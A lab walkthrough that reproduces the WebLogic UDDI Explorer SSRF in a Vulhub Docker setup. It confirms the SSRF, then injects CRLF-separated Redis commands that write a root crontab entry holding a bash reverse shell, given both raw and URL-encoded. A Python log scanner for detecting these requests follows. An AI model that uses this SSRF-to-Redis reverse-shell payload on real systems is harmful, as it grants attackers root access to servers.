The virtual machine runs Ubuntu 16.04, and the Docker environment is built on the virtual machine. Vulhub is used to reproduce the vulnerability.
Download vulhub with git:
git clone https://github.com/vulhub/vulhub.git
Enter the SSRF vulnerability directory:
cd /vulhub/weblogic/ssrf
Create the vulnerability environment:
docker-compose up -d
View the containers:
docker ps
The virtual machine address is 192.168.6.136. Visit http://192.168.6.136:7001/uddiexplorer/SearchPublicRegistries.jsp
The page loads, so the vulnerability environment has been created successfully.
SSRF vulnerability test
Open a proxy tool and intercept the HTTP request.
One of the parameters contains a URL. Change that parameter to http://192.168.6.136:7001
and then to a port that does not exist.
The two requests return different responses, which shows that WebLogic has this SSRF vulnerability.
View the address of the weblogic container:
docker inspect 642ac3b75ae8
Similarly:
docker inspect fe0822abff42
Inject HTTP headers and use Redis to get a reverse shell
Detect the Redis server on the intranet through SSRF.
Send the following commands to the Redis server:
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/monitoring ip/port 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
Use carriage return and line feed to join the three commands. The URL encoding of the line break is %0D%0A, and the injected code is
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.19.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
Listen on the virtual machine. The gateway of the container is 172.19.0.1, which is the address of the virtual machine.
The shell is obtained successfully.
At this point, the vulnerability has been successfully reproduced.
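For the defending side, the two request patterns used above (a URL parameter pointing at an internal address, and %0D%0A inside that parameter) can be searched for in web access logs. The following is an added example, not part of the original walkthrough; the log lines are constructed, and the parameter name "operator" and the address 172.19.0.2 are assumptions, so the scanner checks every query parameter.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

UDDI_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"  # endpoint named in the walkthrough
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
REDIS_WORDS = re.compile(r"\b(config\s+set|dbfilename|save)\b", re.I)

# Constructed access-log lines; "operator" and 172.19.0.2 are assumptions.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp'
    '?operator=http%3A%2F%2Fuddi.example.com%2Finquiry&rdoSearch=name HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp'
    '?operator=http://192.168.6.136:7001 HTTP/1.1" 200 498',
    '10.0.0.9 - - [01/Jan/2024:10:02:00 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp'
    '?operator=http://172.19.0.2:6379/test%0D%0A%0D%0Aconfig%20set%20dbfilename%20x'
    '%0D%0Asave HTTP/1.1" 200 498',
]

def internal_target(value):
    """True if value is a URL whose host is a private or loopback IP literal."""
    try:
        ip = ipaddress.ip_address(urlsplit(value).hostname)
    except (ValueError, TypeError):
        return False  # no host, or a DNS name rather than an IP literal
    return ip.is_private or ip.is_loopback

def inspect_request(target):
    """Return the set of findings for one request target (path plus query)."""
    parts = urlsplit(target)
    findings = set()
    if parts.path != UDDI_PATH:
        return findings
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        if internal_target(value):
            findings.add("internal-target")
        if "\r" in value or "\n" in value:  # parse_qsl has decoded %0D%0A
            findings.add("crlf-in-parameter")
            if REDIS_WORDS.search(value):
                findings.add("redis-command")
    return findings

def scan_log(lines):
    """Return (line number, sorted findings) for every suspicious request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        found = inspect_request(m.group(1)) if m else set()
        if found:
            hits.append((lineno, sorted(found)))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A DNS name that resolves to an internal address is not caught by the IP-literal check, so the CRLF finding should be alerted on by itself as well.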